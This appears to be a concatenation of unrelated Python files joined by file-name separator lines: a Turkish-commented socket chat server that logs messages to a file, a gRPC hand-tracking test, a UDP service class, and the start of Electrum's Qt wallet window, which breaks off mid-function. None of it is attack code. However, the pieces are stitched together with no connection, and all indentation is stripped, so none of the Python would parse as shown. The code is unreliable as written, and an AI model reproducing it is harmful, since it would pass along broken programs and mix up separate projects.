# Windows 10 ve Linux ile test edildi. Diğer windows sürümleri veya işletim sistemleri ile düzgün çalışmayabilir!
# Gerekli kütüphaneleri pip ile indirmeniz gerekmektedir. Yoksa program başlamaz.
# SSH sunucusunda screen komutu ile çalıştırmanızı öneririz. Aksi taktirde ssh sunucusu ile olan bağlantıyı kestiğiniz anda sunucu kapanır.
# Detaylı bilgi: https://www.fullstackpython.com/screen.html
# 175. satırda kendi sunucunuzun IP adresini yazmayı unutmayın.
# PORT numarasını port.txt adlı dosyadan alır buraya ekleme yapmanıza gerek yok.
#
# [YAPIMCI]
#
# Eren Aydın ~ therenaydin
# E-posta: therenaydin@gmail.com
# Discord: therenaydin#8431
#
# [LISANS]
#
# Bu program ücretsizdir.
# İnsanların üzerinde değişiklik yapması ve kendini geliştirmesi için topluluk ile paylaşılmıştır.
# Programı düzenleyip paylaşabilirsiniz.
# Ödevlerinizde kullanabilirsiniz.
#
# [KAYNAKÇA]
#
# https://www.neuralnine.com/
# https://python-forum.io/
# https://www.youtube.com/channel/UC8wZnXYK_CGKlBcZp-GxYPA (NeuralNine)
# https://pythonprogramming.net/
# https://www.youtube.com/user/sentdex
# https://www.youtube.com/channel/UCi8b7ab1pEJ40hz4E_PDROQ (Melih Görgülü)
# https://stackoverflow.com/
import socket
from threading import Thread
import time
import sys
from colorama import Fore, Back, Style, init
init(autoreset=True)
def accept_incoming_connections(): # Gelen bağlantıları kabul eder.
while True:
client, client_address = SERVER.accept()
print("%s:%s connected." % client_address)
client.send(bytes("8jhhaZaaq766712h5aaoaoaoaoppp17127477VVVAHAGgagx0Pz_12", "utf8")) # Sunucuya "şifreli" mesaj gönderir. Oynamayın.
addresses[client] = client_address
Thread(target=handle_client, args=(client,)).start()
def handle_client(client):
while True:
t = time.localtime()
current_time = time.strftime("[%H:%M:%S]", t)
Thread(target=announcements, args=(client,)).start()
try:
name = client.recv(BUFSIZ).decode("utf8")
if name in users:
client.send(bytes("Looks like you're already connected to the server!", "utf8")) # aynı sunucuya birden fazla client ile bağlanmaya çalışırsanız cliente gönderilecek mesaj.
try:
del clients[client]
except KeyError:
raise KeyError("[ERROR 100] "+name+" Multiple Client Try.") # aynı sunucuya birden fazla client ile bağlanmaya çalışırsanız sunucu konsolunda gösterilecek mesaj.
else:
users.append(name)
global usernames
usernames = ', '.join(users)
welcome = '[Room] Welcome '+ name +'. Enjoy!' + "+"
tmp = " "
tmp = tmp.join(list(clients.values()))
welcome = welcome + tmp
client.send(bytes(welcome, "utf8"))
clients[client] = name
msg = name +" connected to room."+"+"
joinlog = current_time +" >>>>>"+name +" connected to room." + "<<<<<"
with open("LOGS.txt","a") as output: # LOGS.txt dosyasına giren kişiyi kayıt alır.
output.write(joinlog + '\n')
output.close()
tmp = " "
tmp = tmp.join(list(clients.values()))
msg = msg + tmp
broadcast(bytes(msg, "utf8"))
break
except ConnectionResetError:
try:
del clients[client]
except:
pass
try:
users.remove(name)
except:
pass
except BrokenPipeError:
pass
while True:
try:
msg = client.recv(BUFSIZ)
checkMessage = str(msg)
if len(msg) > 60:
client.send(bytes("[Room] Message is too long (maximum is 60 characters).", "utf8")) # mesaj 60 karakterden uzun ise yayınlanmaz ve hata mesajı gönderilir.
elif (msg == "7AHSGHA8125125125.AGSAGMKJASAH_1571257125AHSH.ZZZZZ"): # oynamayın.
client.send(bytes("[Room] Failed to send message, try again...", "utf8"))
elif (checkMessage.find("kagsjhHYA") != -1): # Dosya gönderildiği zaman sunucudaki herkese bildirilir. Oynaşmayın.
sender = checkMessage.split("+")[1]
filename = checkMessage.split("+")[2]
newFile = "jkkasgjasg76666AJHAHAHxxxxCf"+"+"+"[Room] "+sender + " has sent '"+filename+"."
broadcast(bytes(newFile, "utf8"))
else:
broadcast(msg, name+": ")
except:
try:
client.close()
users.remove(name)
del clients[client]
msg = name +" left the chat."+"+"
leftlog = current_time +" >>>>>"+name + " left the chat." + "<<<<<"
with open("LOGS.txt","a") as output: # Sunucudan ayrılınca LOGS.txt dosyasına kayıt alır.
output.write(leftlog + '\n')
output.close()
msg = msg + name
broadcast(bytes(msg, "utf8"))
break
except KeyError:
break
else:
msg = name +" left the chat."+"+"
leftlog1 = current_time +" >>>>>" +name + " left the chat." + "<<<<<"
with open("LOGS.txt","a") as output: # Sunucudan ayrılınca LOGS.txt dosyasına kayıt alır.
output.write(leftlog1 + '\n')
output.close()
msg = msg + name
try:
del clients[client]
except KeyError:
break
broadcast(bytes(msg, "utf8"))
users.remove(name)
break
if msg != "1J731JSG81jags881952kdpiSf18shj-123aasgxXAGa11_sfgCCCXXzzzz":
msglog = msg.decode("utf8").rstrip()
namelog = name
message_log = current_time +" " +namelog + ": " + msglog
with open("LOGS.txt","a") as output: # Gönderilen bütün mesajları LOGS.txt dosyasına kaydeder.
output.write(message_log + '\n')
def announcements(client): # zaman aşımına uğramamak için yazılmış fonksiyon. Oynamayın.
while True:
try:
time.sleep(120)
timeoutProtect = "1J731JSG81jags881952kdpiSf18shj-123aasgxXAGa11_sfgCCCXXzzzz"
client.send(bytes(timeoutProtect, "utf8"))
time.sleep(120)
except OSError:
pass
def broadcast(msg, prefix=""): # Mesajları bütün clientlere ileten fonksiyon.
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
users = []
clients = {}
addresses = {}
with open("port.txt", 'r') as f: # port.txt dosyasından portu alır.
portstr = f.readline().strip()
HOST = '127.0.0.1' # Buraya ssh serverinizin IP adresini girin.
PORT = int(portstr)
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket.socket(family = socket.AF_INET, type = socket.SOCK_STREAM, proto = 0)
SERVER.bind((ADDR))
if __name__ == "__main__": # konsolda çıkacak yazılar. Print dışındaki bölümlerle fazla oynamayın.
SERVER.listen(5)
print(Fore.GREEN + "Server Started!")
print(Fore.GREEN + "Clients now can connect.")
print(Fore.GREEN + "Listening...\n")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
|
test_hand_tracking.py
|
import threading
import grpc
from proto.mediapipe.framework.formats import landmark_pb2
from proto.qoin.proto import hand_tracking_pb2_grpc, hand_tracking_pb2
from tests import ServerTestCase
class TestHandTracking(ServerTestCase):
def test_bypass(self):
stub = hand_tracking_pb2_grpc.HandTrackingStub(self.channel)
should_send = False
def push():
def request_generator():
while True:
if should_send:
landmarks = [landmark_pb2.NormalizedLandmark(x=0, y=0, z=0)]
landmark_list = landmark_pb2.NormalizedLandmarkList(landmark=landmarks)
yield hand_tracking_pb2.HandTrackingPushRequest(landmark_list=landmark_list)
try:
stub.HandTrackingPushStream(request_generator())
except grpc._channel._InactiveRpcError: # noqa
pass
threading.Thread(target=push).start()
def pull(_self, stream_event):
res = stub.HandTrackingPullStream(hand_tracking_pb2.HandTrackingPullRequest())
try:
for _ in res:
stream_event.set()
except grpc._channel._MultiThreadedRendezvous: # noqa
pass
events = list()
for i in range(self.workers):
event = threading.Event()
threading.Thread(target=pull, args=(self, event)).start()
events.append(event)
for event in events:
self.assertFalse(event.is_set())
should_send = True
for event in events:
event.wait(1)
for event in events[:-1]:
self.assertTrue(event.is_set())
self.assertFalse(events[-1].is_set())
self.channel.close()
|
UdpService.py
|
from __future__ import annotations
from logging import getLogger
from math import inf
from socket import AF_INET, SOCK_DGRAM
from threading import Thread
from typing import Optional, Tuple
from ..clock import IClock
from ..constants import buffer_size
from ..log.util import log_method_call
from ..receive import IReceiveListener
from ..service import IService, IServiceManager
from ..socket_ import ISocket, ISocketFactory
from ..unreliable import IUnreliableOsErrorListener, IUnreliableReceiveListener, IUnreliableReceiveSendService
from ..util import checking
from ..util.ConnectionDetails import ConnectionDetails
from ..util.Listeners import Listeners
from ..util.Placeholder import Placeholder
class UdpService(IService, IUnreliableReceiveSendService):
def __init__(
self,
clock: IClock,
is_server: bool,
server_address: Placeholder[Tuple[str, int]],
service_manager: IServiceManager,
socket_factory: ISocketFactory,
unreliable_timeout_seconds: float = inf,
) -> None:
logger = getLogger(__name__)
self.clock = clock
self.is_server = is_server
self.os_error_listeners: Listeners[IUnreliableOsErrorListener] = Listeners()
self.receiver_address: Optional[Tuple[str, int]] = None
self.last_received_seconds = -inf
self.received_listeners: Listeners[IReceiveListener] = Listeners()
self.server_address = server_address
self.service_manager = service_manager
self.should_run = True
self.socket: Placeholder[ISocket] = Placeholder()
self.socket_factory = socket_factory
self.thread = Thread(target=log_method_call(logger, self.run))
self.unreliable_received_listeners: Listeners[IUnreliableReceiveListener] = Listeners()
self.unreliable_timeout_seconds = unreliable_timeout_seconds
service_manager.add_service(self)
def add_unreliable_os_error_listener(self, listener: IUnreliableOsErrorListener) -> UdpService:
self.os_error_listeners.add_listener(listener)
return self
def add_receive_listener(self, listener: IReceiveListener) -> UdpService:
self.received_listeners.add_listener(listener)
return self
def add_unreliable_receive_listener(
self,
listener: IUnreliableReceiveListener
) -> UdpService:
self.unreliable_received_listeners.add_listener(listener)
return self
def get_service_name(self) -> str:
return __name__
def join_service(self, timeout_seconds: Optional[float] = None) -> bool:
self.thread.join(timeout_seconds)
return self.thread.is_alive()
def run(self) -> None:
with self.socket.set(self.socket_factory.socket(AF_INET, SOCK_DGRAM)) as socket:
server_address = self.server_address.get_eventually(self.service_manager).get_blocking()
if server_address is None:
return
if self.is_server:
socket.bind(server_address)
else:
self.receiver_address = server_address
while self.should_run:
try:
(message, receiver_address) = socket.recvfrom(buffer_size)
if receiver_address is None:
break
self.last_received_seconds = self.clock.get_seconds()
connection_details = ConnectionDetails(socket.getsockname(), receiver_address)
self.receiver_address = receiver_address
self.received_listeners.for_each(
lambda listener: listener.on_receive(message, connection_details))
self.unreliable_received_listeners.for_each(
lambda listener: listener.on_unreliable_receive(message, connection_details))
except OSError as os_error:
self.os_error_listeners.for_each(
lambda listener: listener.on_unreliable_os_error(os_error))
def send(self, message: bytes) -> None:
checking.check_message_length(len(message))
receiver_address = self.receiver_address
if receiver_address is None:
return
if self.last_received_seconds + self.unreliable_timeout_seconds < self.clock.get_seconds():
return
socket = self.socket.get_optional()
if socket is not None:
socket.sendto(message, receiver_address)
def start_service(self) -> None:
self.thread.start()
def stop_service(self) -> None:
self.should_run = False
socket = self.socket.get_optional_and_clear()
if socket is not None:
socket.shutdown_guaranteed()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your SSL certificate file", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.lnworker and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
